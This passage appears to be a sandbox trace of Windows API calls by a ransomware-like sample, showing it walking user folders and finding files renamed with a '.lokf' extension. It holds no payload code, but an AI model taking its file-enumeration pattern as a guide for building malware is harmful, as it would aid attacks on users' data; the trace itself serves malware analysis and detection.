out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f72bfd0, ftCreationTime.dwHighDateTime=0x1d4cdfe, ftLastAccessTime.dwLowDateTime=0x212664f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x212664f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.294] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f72bfd0, ftCreationTime.dwHighDateTime=0x1d4cdfe, ftLastAccessTime.dwLowDateTime=0x212664f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x212664f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.294] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x379835e0, ftCreationTime.dwHighDateTime=0x1d4c745, ftLastAccessTime.dwLowDateTime=0x71954cf0, ftLastAccessTime.dwHighDateTime=0x1d4cdbd, ftLastWriteTime.dwLowDateTime=0x211cdf70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x708f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6P7rf5fA1SneQ8RjIP.ods.lokf", cAlternateFileName="6P7RF5~1.LOK")) returned 1 [0148.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\6P7rf5fA1SneQ8RjIP.ods.lokf") returned=".lokf" [0148.294] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7490180, ftCreationTime.dwHighDateTime=0x1d4d23a, ftLastAccessTime.dwLowDateTime=0xda038c30, ftLastAccessTime.dwHighDateTime=0x1d4cd8f, ftLastWriteTime.dwLowDateTime=0x211f40d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x10469, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7GGLnQdzt-Q9-.ots.lokf", cAlternateFileName="7GGLNQ~1.LOK")) returned 1 [0148.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\7GGLnQdzt-Q9-.ots.lokf") returned=".lokf" [0148.294] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c00820, ftCreationTime.dwHighDateTime=0x1d4d06a, ftLastAccessTime.dwLowDateTime=0x21cd84c0, ftLastAccessTime.dwHighDateTime=0x1d4c9a9, ftLastWriteTime.dwLowDateTime=0x211f40d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1595e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FC-e.pptx.lokf", cAlternateFileName="FC-EPP~1.LOK")) returned 1 [0148.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\FC-e.pptx.lokf") returned=".lokf" [0148.294] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4db940c0, ftCreationTime.dwHighDateTime=0x1d4d18c, ftLastAccessTime.dwLowDateTime=0x3a0c1380, ftLastAccessTime.dwHighDateTime=0x1d4d363, ftLastWriteTime.dwLowDateTime=0x2121a230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x684, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pzfb-2YEs.pptx.lokf", cAlternateFileName="PZFB-2~1.LOK")) returned 1 [0148.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Pzfb-2YEs.pptx.lokf") returned=".lokf" [0148.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q4CVm42sPsNlTUJg5b.csv.lokf") returned=".lokf" [0148.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q6NKNt7D.xlsx.lokf") returned=".lokf" [0148.294] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.295] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.295] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.295] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\") returned="pW62l8V1WmQv\\" [0148.295] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\") returned="xw_W- RtiM1Q0r\\" [0148.295] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.295] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.295] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.295] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.295] PathFindFileNameW (pszPath="") returned="" [0148.295] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b33ed90, ftCreationTime.dwHighDateTime=0x1d4d2f4, ftLastAccessTime.dwLowDateTime=0x21324bd0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21324bd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\7Bi8C_q4pStHzT.docx.lokf") returned=".lokf" [0148.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\E8XcFurbwLsj.rtf.lokf") returned=".lokf" [0148.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\ipuh6vEIRVj3YgV2b.pdf.lokf") returned=".lokf" [0148.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\J45F bTMyBPSJH5EBiu.odt.lokf") returned=".lokf" [0148.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\K01vTC0.xlsx.lokf") returned=".lokf" [0148.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\r8w4K7BjGpJr7cvfGvO.ots.lokf") returned=".lokf" [0148.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\sj-YHyN9.pptx.lokf") returned=".lokf" [0148.298] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.299] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.299] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.299] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\") returned="-Y1PqBS8_MAyXOFE\\" [0148.299] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\") returned="eIv9rDB\\" [0148.299] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0148.299] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.299] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.299] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.299] PathFindFileNameW (pszPath="") returned="" [0148.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75906a80, ftCreationTime.dwHighDateTime=0x1d4d3bf, ftLastAccessTime.dwLowDateTime=0x21396ff0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21396ff0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.302] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\iuj_U3uV2UvsBrXi.wav.lokf") returned=".lokf" [0148.302] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\k9qaL9eZD8xHKw.m4a.lokf") returned=".lokf" [0148.302] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\X3njm42.mp3.lokf") returned=".lokf" [0148.302] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\yLAA3zbV.wav.lokf") returned=".lokf" [0148.302] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.303] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.303] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.303] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\") returned="iCD5MmspTIMUES\\" [0148.303] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0148.303] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0148.303] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.303] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.303] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.303] PathFindFileNameW (pszPath="") returned="" [0148.303] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66899650, ftCreationTime.dwHighDateTime=0x1d4c80d, ftLastAccessTime.dwLowDateTime=0x2142f570, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2142f570, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\1fE6ecc0BbC6tSRJo26.mp3.lokf") returned=".lokf" [0148.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ApuXtGetFJ4Lr9.wav.lokf") returned=".lokf" [0148.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\lOMYgti3I.wav.lokf") returned=".lokf" [0148.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\WQ3CvenEAYLHrobZJZN.wav.lokf") returned=".lokf" [0148.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\Z-23Z6qoTq8B67.m4a.lokf") returned=".lokf" [0148.306] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.307] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.307] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.307] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\") returned="m Cm9nOn1JJtRb93m\\" [0148.307] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0148.307] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0148.307] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.307] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.307] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.307] PathFindFileNameW (pszPath="") returned="" [0148.307] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3b2a300, ftCreationTime.dwHighDateTime=0x1d4cba5, ftLastAccessTime.dwLowDateTime=0x21513db0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21513db0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.310] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\0BW0y.mkv.lokf") returned=".lokf" [0148.310] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\3ReWfL7YLyi_9fKl.swf.lokf") returned=".lokf" [0148.311] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\4C47 OYV277RnlFF.avi.lokf") returned=".lokf" [0148.311] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\aBWJz5OOK2UC2wWbUb-K.flv.lokf") returned=".lokf" [0148.311] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\r00ipKmOR8h.mkv.lokf") returned=".lokf" [0148.311] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\UEUtG KZ03LCY HCeSa.mkv.lokf") returned=".lokf" [0148.311] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\YGVwuDjMl2Ykk_YA8hkk.flv.lokf") returned=".lokf" [0148.311] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.311] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.311] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.312] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\") returned="XeSTpd\\" [0148.312] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0148.312] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0148.312] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.312] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.312] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.312] PathFindFileNameW (pszPath="") returned="" [0148.312] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43e2de00, ftCreationTime.dwHighDateTime=0x1d4c938, ftLastAccessTime.dwLowDateTime=0x215861d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x215861d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.314] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\HBgjb_CwGZsxIo486q.avi.lokf") returned=".lokf" [0148.314] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\sTjbuO.swf.lokf") returned=".lokf" [0148.314] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\wEuF.swf.lokf") returned=".lokf" [0148.314] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\xRy69j3Nzz.flv.lokf") returned=".lokf" [0148.314] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\y2xQ-g5gOjeuQ_T_E.mp4.lokf") returned=".lokf" [0148.314] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.315] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.315] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0148.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0148.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.315] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.315] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.315] PathFindFileNameW (pszPath="") returned="" [0148.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.315] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.316] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.316] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.316] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0148.316] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0148.316] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.316] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.316] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.316] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.316] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.316] PathFindFileNameW (pszPath="") returned="" [0148.316] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.318] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.318] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.318] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0148.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0148.319] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.319] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.319] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.319] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.319] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.319] PathFindFileNameW (pszPath="") returned="" [0148.319] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.320] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.320] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.320] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0148.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0148.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.320] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.320] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.320] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.320] PathFindFileNameW (pszPath="") returned="" [0148.320] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, 